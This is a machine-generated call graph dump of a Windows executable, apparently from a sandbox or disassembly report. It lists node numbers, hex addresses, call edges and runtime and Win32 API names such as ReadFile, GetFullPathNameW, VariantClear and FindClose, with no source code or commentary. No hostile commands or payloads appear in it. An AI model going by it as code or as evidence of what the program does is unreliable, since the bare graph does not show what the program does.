41ae56 ___lock_fhandle 48 API calls 87374->87377 87379 41d879 87377->87379 87378 41d846 87409 417f25 10 API calls __cftof2_l 87378->87409 87381 41d893 87379->87381 87382 41d887 87379->87382 87410 417f77 46 API calls __getptd_noexit 87381->87410 87390 41d762 87382->87390 87383 41d81f type_info::_Type_info_dtor 87383->87356 87386 41d88d 87411 41d8ba LeaveCriticalSection __unlock_fhandle 87386->87411 87388->87348 87389->87346 87412 41aded 87390->87412 87392 41d7c8 87425 41ad67 47 API calls 2 library calls 87392->87425 87394 41d772 87394->87392 87397 41aded __lseek_nolock 46 API calls 87394->87397 87404 41d7a6 87394->87404 87395 41aded __lseek_nolock 46 API calls 87398 41d7b2 CloseHandle 87395->87398 87396 41d7d0 87403 41d7f2 87396->87403 87426 417f9d 46 API calls 3 library calls 87396->87426 87399 41d79d 87397->87399 87398->87392 87401 41d7be GetLastError 87398->87401 87400 41aded __lseek_nolock 46 API calls 87399->87400 87400->87404 87401->87392 87403->87386 87404->87392 87404->87395 87405->87371 87406->87383 87407->87373 87408->87378 87409->87383 87410->87386 87411->87383 87413 41ae12 87412->87413 87414 41adfa 87412->87414 87417 417f8a __set_osfhnd 46 API calls 87413->87417 87418 41ae51 87413->87418 87415 417f8a __set_osfhnd 46 API calls 87414->87415 87416 41adff 87415->87416 87419 417f77 __cftof2_l 46 API calls 87416->87419 87420 41ae23 87417->87420 87418->87394 87421 41ae07 87419->87421 87422 417f77 __cftof2_l 46 API calls 87420->87422 87421->87394 87423 41ae2b 87422->87423 87424 417f25 __cftof2_l 10 API calls 87423->87424 87424->87421 87425->87396 87426->87403 87428 414c82 type_info::_Type_info_dtor 87427->87428 87429 414cc3 87428->87429 87430 414c96 __cftof2_l 87428->87430 87431 414cbb type_info::_Type_info_dtor 87428->87431 87432 415471 __lock_file 47 API calls 87429->87432 87454 417f77 46 API calls __getptd_noexit 87430->87454 87431->87098 87434 414ccb 87432->87434 87440 414aba 87434->87440 87436 414cb0 87455 417f25 10 API calls __cftof2_l 87436->87455 87441 414af2 87440->87441 87445 414ad8 __cftof2_l 87440->87445 87456 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 87441->87456 87442 414ae2 87507 417f77 46 API calls __getptd_noexit 87442->87507 87444 414b2d 87444->87441 87448 414c38 __cftof2_l 87444->87448 87449 414139 __flswbuf 46 API calls 87444->87449 87457 41dfcc 87444->87457 87487 41d8f3 87444->87487 87509 41e0c2 46 API calls 2 library calls 87444->87509 87445->87441 87445->87442 87445->87444 87510 417f77 46 API calls __getptd_noexit 87448->87510 87449->87444 87453 414ae7 87508 417f25 10 API calls __cftof2_l 87453->87508 87454->87436 87455->87431 87456->87431 87458 41dfd8 type_info::_Type_info_dtor 87457->87458 87459 41dfe0 87458->87459 87460 41dffb 87458->87460 87580 417f8a 46 API calls __getptd_noexit 87459->87580 87461 41e007 87460->87461 87467 41e041 87460->87467 87582 417f8a 46 API calls __getptd_noexit 87461->87582 87464 41dfe5 87581 417f77 46 API calls __getptd_noexit 87464->87581 87466 41e00c 87583 417f77 46 API calls __getptd_noexit 87466->87583 87469 41e063 87467->87469 87470 41e04e 87467->87470 87472 41ae56 ___lock_fhandle 48 API calls 87469->87472 87585 417f8a 46 API calls __getptd_noexit 87470->87585 87475 41e069 87472->87475 87473 41e014 87584 417f25 10 API calls __cftof2_l 87473->87584 87474 41e053 87586 417f77 46 API calls __getptd_noexit 87474->87586 87478 41e077 87475->87478 87479 41e08b 87475->87479 87477 41dfed type_info::_Type_info_dtor 87477->87444 87511 41da15 87478->87511 87587 417f77 46 API calls __getptd_noexit 87479->87587 87483 41e083 87589 41e0ba LeaveCriticalSection __unlock_fhandle 87483->87589 87484 41e090 87588 417f8a 46 API calls __getptd_noexit 87484->87588 87488 41d900 87487->87488 87492 41d915 87487->87492 87593 417f77 46 API calls __getptd_noexit 87488->87593 87490 41d905 87594 417f25 10 API calls __cftof2_l 87490->87594 87493 41d94a 87492->87493 87498 41d910 87492->87498 87590 420603 87492->87590 87495 414139 __flswbuf 46 API calls 87493->87495 87496 41d95e 87495->87496 87497 41dfcc __read 59 API calls 87496->87497 87499 41d965 87497->87499 87498->87444 87499->87498 87500 414139 __flswbuf 46 API calls 87499->87500 87501 41d988 87500->87501 87501->87498 87502 414139 __flswbuf 46 API calls 87501->87502 87503 41d994 87502->87503 87503->87498 87504 414139 __flswbuf 46 API calls 87503->87504 87505 41d9a1 87504->87505 87506 414139 __flswbuf 46 API calls 87505->87506 87506->87498 87507->87453 87508->87441 87509->87444 87510->87453 87512 41da31 87511->87512 87513 41da4c 87511->87513 87514 417f8a __set_osfhnd 46 API calls 87512->87514 87515 41da5b 87513->87515 87517 41da7a 87513->87517 87516 41da36 87514->87516 87518 417f8a __set_osfhnd 46 API calls 87515->87518 87519 417f77 __cftof2_l 46 API calls 87516->87519 87521 41da98 87517->87521 87533 41daac 87517->87533 87520 41da60 87518->87520 87534 41da3e 87519->87534 87524 417f77 __cftof2_l 46 API calls 87520->87524 87522 417f8a __set_osfhnd 46 API calls 87521->87522 87525 41da9d 87522->87525 87523 41db02 87527 417f8a __set_osfhnd 46 API calls 87523->87527 87526 41da67 87524->87526 87529 417f77 __cftof2_l 46 API calls 87525->87529 87530 417f25 __cftof2_l 10 API calls 87526->87530 87528 41db07 87527->87528 87531 417f77 __cftof2_l 46 API calls 87528->87531 87532 41daa4 87529->87532 87530->87534 87531->87532 87536 417f25 __cftof2_l 10 API calls 87532->87536 87533->87523 87533->87534 87535 41dae1 87533->87535 87537 41db1b 87533->87537 87534->87483 87535->87523 87540 41daec ReadFile 87535->87540 87536->87534 87539 416b04 __malloc_crt 46 API calls 87537->87539 87541 41db31 87539->87541 87542 41dc17 87540->87542 87543 41df8f GetLastError 87540->87543 87546 41db59 87541->87546 87547 41db3b 87541->87547 87542->87543 87548 41dc2b 87542->87548 87544 41de16 87543->87544 87545 41df9c 87543->87545 87555 417f9d __dosmaperr 46 API calls 87544->87555 87559 41dd9b 87544->87559 87550 417f77 __cftof2_l 46 API calls 87545->87550 87549 420494 __lseeki64_nolock 48 API calls 87546->87549 87551 417f77 __cftof2_l 46 API calls 87547->87551 87548->87559 87561 41de5b 87548->87561 87562 41dc47 87548->87562 87552 41db67 87549->87552 87553 41dfa1 87550->87553 87554 41db40 87551->87554 87552->87540 87556 417f8a __set_osfhnd 46 API calls 87553->87556 87557 417f8a __set_osfhnd 46 API calls 87554->87557 87555->87559 87556->87559 87557->87534 87558 413748 _free 46 API calls 87558->87534 87559->87534 87559->87558 87560 41ded0 ReadFile 87565 41deef GetLastError 87560->87565 87572 41def9 87560->87572 87561->87559 87561->87560 87563 41dcab ReadFile 87562->87563 87568 41dd28 87562->87568 87564 41dcc9 GetLastError 87563->87564 87571 41dcd3 87563->87571 87564->87562 87564->87571 87565->87561 87565->87572 87566 41ddec MultiByteToWideChar 87566->87559 87567 41de10 GetLastError 87566->87567 87567->87544 87568->87559 87569 41dda3 87568->87569 87570 41dd96 87568->87570 87574 41dd60 87568->87574 87569->87574 87575 41ddda 87569->87575 87573 417f77 __cftof2_l 46 API calls 87570->87573 87571->87562 87576 420494 __lseeki64_nolock 48 API calls 87571->87576 87572->87561 87577 420494 __lseeki64_nolock 48 API calls 87572->87577 87573->87559 87574->87566 87578 420494 __lseeki64_nolock 48 API calls 87575->87578 87576->87571 87577->87572 87579 41dde9 87578->87579 87579->87566 87580->87464 87581->87477 87582->87466 87583->87473 87584->87477 87585->87474 87586->87473 87587->87484 87588->87483 87589->87477 87591 416b04 __malloc_crt 46 API calls 87590->87591 87592 420618 87591->87592 87592->87493 87593->87490 87594->87498 87598 4148b3 GetSystemTimeAsFileTime __aulldiv 87595->87598 87597 442c6b 87597->87101 87598->87597 87599->87109 87600->87114 87601->87114 87607 45272f __tzset_nolock _wcscpy 87602->87607 87603 414d04 61 API calls __fread_nolock 87603->87607 87604 44afef GetSystemTimeAsFileTime 87604->87607 87605 4528a4 87605->87023 87605->87024 87606 4150d1 81 API calls _fseek 87606->87607 87607->87603 87607->87604 87607->87605 87607->87606 87609 44b1bc 87608->87609 87610 44b1ca 87608->87610 87611 4149c2 116 API calls 87609->87611 87612 44b1e1 87610->87612 87613 44b1d8 87610->87613 87614 4149c2 116 API calls 87610->87614 87611->87610 87643 4321a4 87612->87643 87613->87051 87616 44b2db 87614->87616 87616->87612 87618 44b2e9 87616->87618 87617 44b224 87619 44b253 87617->87619 87620 44b228 87617->87620 87621 44b2f6 87618->87621 87623 414a46 __fcloseall 82 API calls 87618->87623 87647 43213d 87619->87647 87622 44b235 87620->87622 87626 414a46 __fcloseall 82 API calls 87620->87626 87621->87051 87627 44b245 87622->87627 87630 414a46 __fcloseall 82 API calls 87622->87630 87623->87621 87625 44b25a 87628 44b260 87625->87628 87629 44b289 87625->87629 87626->87622 87627->87051 87631 44b26d 87628->87631 87633 414a46 __fcloseall 82 API calls 87628->87633 87657 44b0bf 87 API calls 87629->87657 87630->87627 87634 44b27d 87631->87634 87636 414a46 __fcloseall 82 API calls 87631->87636 87633->87631 87634->87051 87635 44b28f 87658 4320f8 46 API calls _free 87635->87658 87636->87634 87638 44b295 87639 414a46 __fcloseall 82 API calls 87638->87639 87641 44b2a2 87638->87641 87639->87641 87640 44b2b2 87640->87051 87641->87640 87642 414a46 __fcloseall 82 API calls 87641->87642 87642->87640 87644 4321b4 __tzset_nolock _memmove 87643->87644 87645 4321cb 87643->87645 87644->87617 87646 414d04 __fread_nolock 61 API calls 87645->87646 87646->87644 87648 4135bb _malloc 46 API calls 87647->87648 87649 432150 87648->87649 87650 4135bb _malloc 46 API calls 87649->87650 87651 432162 87650->87651 87652 4135bb _malloc 46 API calls 87651->87652 87653 432174 87652->87653 87655 432189 87653->87655 87659 4320f8 46 API calls _free 87653->87659 87655->87625 87656 432198 87656->87625 87657->87635 87658->87638 87659->87656 87660->86954 87661->86956 87662->86971 87663->86971 87664->86971 87665->86965 87666->86971 87667->86971 87668->86978 87669->86988 87670->86986 87671->86986 87721 410160 87672->87721 87674 41012f GetFullPathNameW 87675 410147 ctype 87674->87675 87675->86808 87677 4102cb SHGetDesktopFolder 87676->87677 87680 410333 _wcsncpy 87676->87680 87678 4102e0 _wcsncpy 87677->87678 87677->87680 87679 41031c SHGetPathFromIDListW 87678->87679 87678->87680 87679->87680 87680->86811 87682 425f4a 87681->87682 87683 4101bb 87681->87683 87686 4114ab __wcsicoll 58 API calls 87682->87686 87689 425f6e 87682->87689 87684 410160 52 API calls 87683->87684 87685 4101c7 87684->87685 87725 410200 52 API calls 2 library calls 87685->87725 87686->87682 87688 4101d6 87726 410200 52 API calls 2 library calls 87688->87726 87689->86813 87691 4101e9 87691->86813 87693 40f760 128 API calls 87692->87693 87694 40f584 87693->87694 87695 429335 87694->87695 87696 40f58c 87694->87696 87699 4528bd 118 API calls 87695->87699 87697 40f598 87696->87697 87698 429358 87696->87698 87730 4033c0 113 API calls 7 library calls 87697->87730 87731 434034 86 API calls _wprintf 87698->87731 87701 42934b 87699->87701 87705 429373 87701->87705 87706 42934f 87701->87706 87703 429369 87703->87705 87704 40f5b4 87704->86809 87707 4115d7 52 API calls 87705->87707 87708 431e58 82 API calls 87706->87708 87720 4293c5 ctype 87707->87720 87708->87698 87709 42959c 87710 413748 _free 46 API calls 87709->87710 87711 4295a5 87710->87711 87712 431e58 82 API calls 87711->87712 87713 4295b1 87712->87713 87717 401b10 52 API calls 87717->87720 87720->87709 87720->87717 87727 444af8 87720->87727 87732 44c7dd 64 API calls 3 library calls 87720->87732 87733 44b41c 52 API calls 87720->87733 87734 402780 52 API calls 2 library calls 87720->87734 87735 4022d0 52 API calls ctype 87720->87735 87722 410167 _wcslen 87721->87722 87723 4115d7 52 API calls 87722->87723 87724 41017e _wcscpy 87723->87724 87724->87674 87725->87688 87726->87691 87728 4115d7 52 API calls 87727->87728 87729 444b27 _memmove 87728->87729 87729->87720 87730->87704 87731->87703 87732->87720 87733->87720 87734->87720 87735->87720 87737 402539 ctype 87736->87737 87738 402417 87736->87738 87737->86817 87738->87737 87739 4115d7 52 API calls 87738->87739 87740 402443 87739->87740 87741 4115d7 52 API calls 87740->87741 87743 4024b4 87741->87743 87743->87737 87765 402880 87743->87765 87807 4022d0 52 API calls ctype 87743->87807 87749 401566 87745->87749 87746 401794 87822 40e9a0 90 API calls 87746->87822 87749->87746 87750 40167a 87749->87750 87751 4010a0 52 API calls 87749->87751 87752 4017c0 87750->87752 87823 45e737 90 API calls 3 library calls 87750->87823 87751->87749 87752->86819 87754 40bc70 52 API calls 87753->87754 87755 40d451 87754->87755 87756 40d50f 87755->87756 87758 40e0a0 52 API calls 87755->87758 87759 427c01 87755->87759 87761 401b10 52 API calls 87755->87761 87762 40d519 87755->87762 87824 40f310 53 API calls 87755->87824 87825 40d860 91 API calls 87755->87825 87826 410600 52 API calls 87756->87826 87758->87755 87827 45e737 90 API calls 3 library calls 87759->87827 87761->87755 87762->86822 87766 4115d7 52 API calls 87765->87766 87767 4028b3 87766->87767 87768 4115d7 52 API calls 87767->87768 87788 4028c5 ctype _memmove 87768->87788 87770 402b1e ctype 87770->87743 87771 427d62 87775 403350 52 API calls 87771->87775 87773 402bb6 87810 403060 53 API calls 87773->87810 87774 402aeb ctype 87778 42802b ctype 87774->87778 87809 402780 52 API calls 2 library calls 87774->87809 87786 427d6b 87775->87786 87777 402bca 87779 427f63 87777->87779 87780 402bd4 87777->87780 87817 460879 92 API calls 3 library calls 87779->87817 87811 402780 52 API calls 2 library calls 87780->87811 87781 403350 52 API calls 87781->87788 87785 402bdf 87785->87743 87806 427f2c 87786->87806 87814 403020 52 API calls _memmove 87786->87814 87787 427fd5 87819 460879 92 API calls 3 library calls 87787->87819 87788->87771 87788->87773 87788->87774 87788->87781 87788->87787 87793 402f00 52 API calls 87788->87793 87795 428000 87788->87795 87797 427fa5 87788->87797 87799 4026f0 52 API calls 87788->87799 87804 402780 52 API calls 87788->87804 87805 4115d7 52 API calls 87788->87805 87788->87806 87808 4031b0 63 API calls 87788->87808 87812 402f80 92 API calls _memmove 87788->87812 87813 402280 52 API calls 87788->87813 87815 4013a0 52 API calls 87788->87815 87791 427f48 87791->87770 87793->87788 87821 460879 92 API calls 3 library calls 87795->87821 87796 427fe4 87820 402780 52 API calls 2 library calls 87796->87820 87818 402780 52 API calls 2 library calls 87797->87818 87801 402a85 CharUpperBuffW 87799->87801 87801->87788 87804->87788 87805->87788 87816 460879 92 API calls 3 library calls 87806->87816 87807->87743 87808->87788 87809->87770 87810->87777 87811->87785 87812->87788 87813->87788 87814->87786 87815->87788 87816->87791 87817->87791 87818->87770 87819->87796 87820->87791 87821->87770 87822->87750 87823->87752 87824->87755 87825->87755 87826->87762 87827->87762 87828->86835 87829->86836 87831 42c5fe 87830->87831 87846 4091c6 87830->87846 87832 40bc70 52 API calls 87831->87832 87831->87846 87833 42c64e InterlockedIncrement 87832->87833 87834 42c665 87833->87834 87840 42c697 87833->87840 87836 42c672 InterlockedDecrement Sleep InterlockedIncrement 87834->87836 87834->87840 87835 42c737 InterlockedDecrement 87837 42c74a 87835->87837 87836->87834 87836->87840 87839 408f40 VariantClear 87837->87839 87838 42c731 87838->87835 87841 42c752 87839->87841 87840->87835 87840->87838 88123 408e80 87840->88123 88136 410c60 VariantClear ctype 87841->88136 87846->86896 87847 42c6db 87848 402160 52 API calls 87847->87848 87849 42c6e5 87848->87849 87850 45340c 85 API calls 87849->87850 87851 42c6f1 87850->87851 88133 40d200 52 API calls 2 library calls 87851->88133 87853 42c6fb 88134 465124 53 API calls 87853->88134 87855 42c715 87856 42c76a 87855->87856 87857 42c719 87855->87857 87858 401b10 52 API calls 87856->87858 88135 46fe32 VariantClear 87857->88135 87860 42c77e 87858->87860 87861 401980 53 API calls 87860->87861 87867 42c796 87861->87867 87862 42c812 88138 46fe32 VariantClear 87862->88138 87864 42c82a InterlockedDecrement 88139 46ff07 54 API calls 87864->88139 87866 42c864 88140 45e737 90 API calls 3 library calls 87866->88140 87867->87862 87867->87866 88137 40ba10 52 API calls 2 library calls 87867->88137 87874 401980 53 API calls 87884 42c849 87874->87884 87875 408f40 VariantClear 87875->87884 87877 402780 52 API calls 87877->87884 87879 408f40 VariantClear 87881 42c891 87879->87881 88141 410c60 VariantClear ctype 87881->88141 87884->87874 87884->87875 87884->87877 87885 42c874 87885->87879 87887 42ca59 87885->87887 87887->87887 87889 40afc4 87888->87889 87890 40b156 87888->87890 87891 40afd5 87889->87891 87892 42d1e3 87889->87892 88195 45e737 90 API calls 3 library calls 87890->88195 87895 40a780 199 API calls 87891->87895 87913 40b11a ctype 87891->87913 88196 45e737 90 API calls 3 library calls 87892->88196 87897 40b00a 87895->87897 87896 42d1f8 87900 408f40 VariantClear 87896->87900 87897->87896 87905 40b012 87897->87905 87899 42d4db 87899->87899 87901 40b143 87900->87901 87901->86896 87902 40b04a 87911 40b05c ctype 87902->87911 88197 40e270 VariantClear ctype 87902->88197 87903 40b094 ctype 87904 40b108 87903->87904 87909 42d425 ctype 87903->87909 87904->87913 88198 40e270 VariantClear ctype 87904->88198 87905->87902 87905->87903 87906 42d231 VariantClear 87905->87906 87906->87911 87907 42d45a VariantClear 87907->87913 87909->87907 87909->87913 87911->87903 87912 4115d7 52 API calls 87911->87912 87912->87903 87913->87901 88199 45e737 90 API calls 3 library calls 87913->88199 87915 4096c6 _wcslen 87914->87915 87916 40a70c ctype _memmove 87915->87916 87917 4115d7 52 API calls 87915->87917 88201 4013a0 52 API calls 87916->88201 87918 4096fa _memmove 87917->87918 87920 4115d7 52 API calls 87918->87920 87922 40971b 87920->87922 87921 4297aa 87924 4115d7 52 API calls 87921->87924 87922->87916 87923 409749 CharUpperBuffW 87922->87923 87927 40976a ctype 87922->87927 87923->87927 87925 4297d1 _memmove 87924->87925 88228 45e737 90 API calls 3 library calls 87925->88228 87983 4097e5 ctype 87927->87983 88202 47dcbb 201 API calls 87927->88202 87929 408f40 VariantClear 87930 42ae92 87929->87930 88229 410c60 VariantClear ctype 87930->88229 87932 42aea4 87933 409aa2 87933->87925 87934 409afe 87933->87934 87935 4115d7 52 API calls 87933->87935 87939 409b2a 87934->87939 87941 4115d7 52 API calls 87934->87941 87935->87934 87936 4115d7 52 API calls 87936->87983 87937 40a689 87938 4115d7 52 API calls 87937->87938 87954 40a6af ctype _memmove 87938->87954 87942 429dbe 87939->87942 88005 409b4d ctype _memmove 87939->88005 88210 40b400 VariantClear VariantClear ctype 87939->88210 87940 40c2c0 52 API calls 87940->87983 87943 429d31 87941->87943 87948 429dd3 87942->87948 88211 40b400 VariantClear VariantClear ctype 87942->88211 87947 429d42 87943->87947 88207 44a801 52 API calls 87943->88207 87944 429a46 VariantClear 87944->87983 87945 409fd2 87952 40a045 87945->87952 88001 42a3f5 87945->88001 87958 40e0a0 52 API calls 87947->87958 87948->88005 88212 40e1c0 VariantClear ctype 87948->88212 87949 408f40 VariantClear 87949->87983 87956 4115d7 52 API calls 87952->87956 87963 4115d7 52 API calls 87954->87963 87964 40a04c 87956->87964 87959 429d57 87958->87959 88208 453443 52 API calls 87959->88208 87961 42a42f 88216 45e737 90 API calls 3 library calls 87961->88216 87963->87916 87967 40a0a7 87964->87967 87968 4091e0 322 API calls 87964->87968 87965 4299d9 87970 408f40 VariantClear 87965->87970 87984 40a0af 87967->87984 88217 40c790 VariantClear ctype 87967->88217 87968->87967 87969 429abd 87969->86896 87972 4299e2 87970->87972 87971 429d88 88209 453443 52 API calls 87971->88209 88204 410c60 VariantClear ctype 87972->88204 87977 40a780 199 API calls 87977->87983 87979 402780 52 API calls 87979->88005 87981 408f40 VariantClear 88015 40a162 ctype _memmove 87981->88015 87982 42a452 87982->87929 87983->87925 87983->87933 87983->87936 87983->87937 87983->87940 87983->87944 87983->87949 87983->87954 87983->87965 87983->87969 87983->87977 87983->87982 88203 40c4e0 199 API calls 87983->88203 88205 40ba10 52 API calls 2 library calls 87983->88205 88206 40e270 VariantClear ctype 87983->88206 87985 40a11b 87984->87985 87986 42a4b4 VariantClear 87984->87986 87984->88015 87993 40a12d ctype 87985->87993 88218 40e270 VariantClear ctype 87985->88218 87986->87993 87987 40a780 199 API calls 87987->88005 87988 4115d7 52 API calls 87988->88005 87990 401980 53 API calls 87990->88005 87991 408e80 VariantClear 87991->88005 87992 4115d7 52 API calls 87992->88015 87993->87992 87993->88015 87994 408e80 VariantClear 87994->88015 87996 44a801 52 API calls 87996->88005 87997 42a74d VariantClear 87997->88015 87998 41130a 51 API calls __cinit 87998->88005 87999 40a368 88000 42aad4 87999->88000 88009 40a397 87999->88009 88221 46fe90 VariantClear VariantClear ctype 88000->88221 88215 47390f VariantClear 88001->88215 88002 42a7e4 VariantClear 88002->88015 88003 42a886 VariantClear 88003->88015 88004 409c95 88004->86896 88005->87916 88005->87945 88005->87961 88005->87979 88005->87987 88005->87988 88005->87990 88005->87991 88005->87996 88005->87998 88005->88001 88005->88004 88213 45f508 52 API calls 88005->88213 88214 403e10 53 API calls 88005->88214 88006 40a3ce 88021 40a3d9 ctype 88006->88021 88222 40b400 VariantClear VariantClear ctype 88006->88222 88008 40e270 VariantClear 88008->88015 88009->88006 88032 40a42c ctype 88009->88032 88200 40b400 VariantClear VariantClear ctype 88009->88200 88012 4115d7 52 API calls 88012->88015 88013 42abaf 88017 42abd4 VariantClear 88013->88017 88027 40a4ee ctype 88013->88027 88014 4115d7 52 API calls 88018 42a5a6 VariantInit VariantCopy 88014->88018 88015->87981 88015->87994 88015->87997 88015->87999 88015->88000 88015->88002 88015->88003 88015->88008 88015->88012 88015->88014 88219 470870 52 API calls 88015->88219 88220 44ccf1 VariantClear ctype 88015->88220 88016 40a4dc 88016->88027 88224 40e270 VariantClear ctype 88016->88224 88017->88027 88018->88015 88023 42a5c6 VariantClear 88018->88023 88019 42ac4f 88028 42ac79 VariantClear 88019->88028 88034 40a546 ctype 88019->88034 88022 40a41a 88021->88022 88025 42ab44 VariantClear 88021->88025 88021->88032 88022->88032 88223 40e270 VariantClear ctype 88022->88223 88023->88015 88024 40a534 88024->88034 88225 40e270 VariantClear ctype 88024->88225 88025->88032 88027->88019 88027->88024 88028->88034 88029 42ad28 88035 42ad4e VariantClear 88029->88035 88040 40a583 ctype 88029->88040 88031 40a571 88031->88040 88226 40e270 VariantClear ctype 88031->88226 88032->88013 88032->88016 88034->88029 88034->88031 88035->88040 88037 40a650 ctype 88037->86896 88038 42ae0e VariantClear 88038->88040 88040->88037 88040->88038 88227 40e270 VariantClear ctype 88040->88227 88042 408fff 88041->88042 88063 40900d 88041->88063 88230 403ea0 52 API calls __cinit 88042->88230 88045 42c3f6 88233 45e737 90 API calls 3 library calls 88045->88233 88047 40a780 199 API calls 88047->88063 88048 42c44a 88235 45e737 90 API calls 3 library calls 88048->88235 88050 42c47b 88236 451b42 61 API calls 88050->88236 88052 42c4cb 88238 47faae 238 API calls 88052->88238 88053 42c564 88057 408f40 VariantClear 88053->88057 88056 42c548 88241 45e737 90 API calls 3 library calls 88056->88241 88075 4090f2 ctype 88057->88075 88058 42c491 88058->88075 88237 45e737 90 API calls 3 library calls 88058->88237 88059 42c4da 88059->88075 88239 45e737 90 API calls 3 library calls 88059->88239 88060 409112 88060->88056 88067 40912b 88060->88067 88061 42c528 88240 45e737 90 API calls 3 library calls 88061->88240 88063->88045 88063->88047 88063->88048 88063->88050 88063->88052 88063->88053 88063->88056 88063->88060 88063->88061 88064 4090df 88063->88064 88069 4090ea 88063->88069 88063->88075 88232 4534e3 52 API calls 88063->88232 88234 40c4e0 199 API calls 88063->88234 88064->88069 88070 408e80 VariantClear 88064->88070 88067->88075 88231 403e10 53 API calls 88067->88231 88071 408f40 VariantClear 88069->88071 88070->88069 88071->88075 88073 40914b 88074 408f40 VariantClear 88073->88074 88074->88075 88075->86896 88242 408d90 88076->88242 88078 408cf9 88079 429778 88078->88079 88082 42976c 88078->88082 88084 408d2d 88078->88084 88270 410c60 VariantClear ctype 88079->88270 88081 429780 88269 45e737 90 API calls 3 library calls 88082->88269 88258 403d10 88084->88258 88087 408d71 ctype 88087->86896 88088 408f40 VariantClear 88089 408d45 ctype 88088->88089 88089->88087 88089->88088 88092 425c87 88090->88092 88094 40d15f 88090->88094 88091 425cc7 88092->88091 88093 425ca1 TranslateAcceleratorW 88092->88093 88093->88094 88094->86896 88096 42602f 88095->88096 88099 40d17f 88095->88099 88096->86896 88097 40d18c 88097->86896 88098 42608e IsDialogMessageW 88098->88097 88098->88099 88099->88097 88099->88098 88555 430c46 GetClassLongW 88099->88555 88101->86896 88102->86846 88103->86851 88104->86896 88105->86896 88106->86896 88107->86896 88108->86903 88109->86903 88110->86903 88111->86903 88112->86903 88113->86903 88114->86903 88116 403cdf 88115->88116 88117 408f40 VariantClear 88116->88117 88118 403ce7 88117->88118 88118->86889 88119->86903 88120->86903 88121->86896 88122->86843 88124 408e88 88123->88124 88126 408e94 88123->88126 88125 408f40 VariantClear 88124->88125 88125->88126 88127 45340c 88126->88127 88128 453439 88127->88128 88129 453419 88127->88129 88128->87847 88130 45342f 88129->88130 88185 4531b1 85 API calls 5 library calls 88129->88185 88130->87847 88132 453425 88132->87847 88133->87853 88134->87855 88135->87838 88136->87846 88137->87867 88138->87864 88139->87884 88140->87885 88141->87846 88185->88132 88195->87892 88196->87896 88197->87911 88198->87913 88199->87899 88200->88006 88201->87921 88202->87927 88203->87983 88204->88037 88205->87983 88206->87983 88207->87947 88208->87971 88209->87939 88210->87942 88211->87948 88212->88005 88213->88005 88214->88005 88215->87961 88216->87982 88217->87967 88218->87993 88219->88015 88220->88015 88221->88006 88222->88021 88223->88032 88224->88027 88225->88034 88226->88040 88227->88040 88228->87982 88229->87932 88230->88063 88231->88073 88232->88063 88233->88075 88234->88063 88235->88075 88236->88058 88237->88075 88238->88059 88239->88075 88240->88075 88241->88053 88243 4289d2 88242->88243 88244 408db3 88242->88244 88273 45e737 90 API calls 3 library calls 88243->88273 88271 40bec0 90 API calls 88244->88271 88247 4289e5 88274 45e737 90 API calls 3 library calls 88247->88274 88248 408e5a 88248->88078 88251 428a05 88253 408f40 VariantClear 88251->88253 88252 408dc9 88252->88247 88252->88248 88252->88251 88254 40a780 199 API calls 88252->88254 88255 408e64 88252->88255 88257 408f40 VariantClear 88252->88257 88272 40ba10 52 API calls 2 library calls 88252->88272 88253->88248 88254->88252 88256 408f40 VariantClear 88255->88256 88256->88248 88257->88252 88259 408f40 VariantClear 88258->88259 88260 403d20 88259->88260 88261 403cd0 VariantClear 88260->88261 88262 403d4d 88261->88262 88275 45e17d 88262->88275 88285 4755ad 88262->88285 88288 467897 88262->88288 88332 4813fa 88262->88332 88342 46e91c 88262->88342 88263 403d76 88263->88079 88263->88089 88269->88079 88270->88081 88271->88252 88272->88252 88273->88247 88274->88251 88276 45e198 88275->88276 88277 45e19c 88276->88277 88278 45e1b8 88276->88278 88280 408f40 VariantClear 88277->88280 88279 45e1db FindClose 88278->88279 88282 45e1cc 88278->88282 88283 45e1d9 ctype 88279->88283 88281 45e1a4 88280->88281 88281->88263 88282->88283 88345 44ae3e 88282->88345 88283->88263 88360 475077 88285->88360 88287 4755c0 88287->88263 88289 4678bb 88288->88289 88292 45340c 85 API calls 88289->88292 88321 467954 88289->88321 88290 4115d7 52 API calls 88291 467989 88290->88291 88293 467995 88291->88293 88479 40da60 53 API calls 88291->88479 88294 4678f6 88292->88294 88297 4533eb 85 API calls 88293->88297 88296 413a0e __wsplitpath 46 API calls 88294->88296 88298 4678fc 88296->88298 88299 4679b7 88297->88299 88300 401b10 52 API calls 88298->88300 88464 40de40 88299->88464 88302 46790c 88300->88302 88476 40d200 52 API calls 2 library calls 88302->88476 88305 467917 88305->88321 88477 4339fa GetFileAttributesW FindFirstFileW FindClose 88305->88477 88315 467928 88319 46792f 88315->88319 88315->88321 88478 4335cd 56 API calls 3 library calls 88319->88478 88321->88290 88322 467964 88321->88322 88322->88263 88328 467939 88328->88321 88330 408f40 VariantClear 88328->88330 88333 45340c 85 API calls 88332->88333 88334 481438 88333->88334 88335 402880 95 API calls 88334->88335 88336 48143f 88335->88336 88337 481465 88336->88337 88338 40a780 199 API calls 88336->88338 88341 481469 88337->88341 88493 40e710 53 API calls 88337->88493 88338->88337 88340 4814a4 88340->88263 88341->88263 88494 46e785 88342->88494 88344 46e92f 88344->88263 88346 44ae4b ctype 88345->88346 88348 443fdf 88345->88348 88346->88283 88353 40da20 88348->88353 88350 443feb 88357 4340db 88350->88357 88352 444001 88352->88346 88354 40da37 88353->88354 88355 40da29 88353->88355 88354->88355 88356 40da3c CloseHandle 88354->88356 88355->88350 88356->88350 88358 40da20 CloseHandle 88357->88358 88359 4340e7 ctype 88358->88359 88359->88352 88411 4533eb 88360->88411 88363 4750ee 88366 408f40 VariantClear 88363->88366 88364 475129 88415 4646e0 88364->88415 88371 4750f5 88366->88371 88367 47515e 88368 475162 88367->88368 88405 47518e 88367->88405 88369 408f40 VariantClear 88368->88369 88370 475357 88371->88287 88379 4533eb 85 API calls 88379->88405 88388 475480 88390 408f40 VariantClear 88388->88390 88398 4754b5 88405->88370 88405->88379 88405->88388 88405->88398 88405->88405 88447 436299 52 API calls 2 library calls 88405->88447 88448 463ad5 64 API calls __wcsicoll 88405->88448 88412 453404 88411->88412 88413 4533f8 88411->88413 88412->88363 88412->88364 88413->88412 88458 4531b1 85 API calls 5 library calls 88413->88458 88459 4536f7 53 API calls 88415->88459 88417 4646fc 88460 4426cd 59 API calls _wcslen 88417->88460 88419 464711 88421 40bc70 52 API calls 88419->88421 88427 46474b 88419->88427 88422 46472c 88421->88422 88461 461465 52 API calls _memmove 88422->88461 88424 464741 88425 40c600 52 API calls 88424->88425 88425->88427 88426 464793 88426->88367 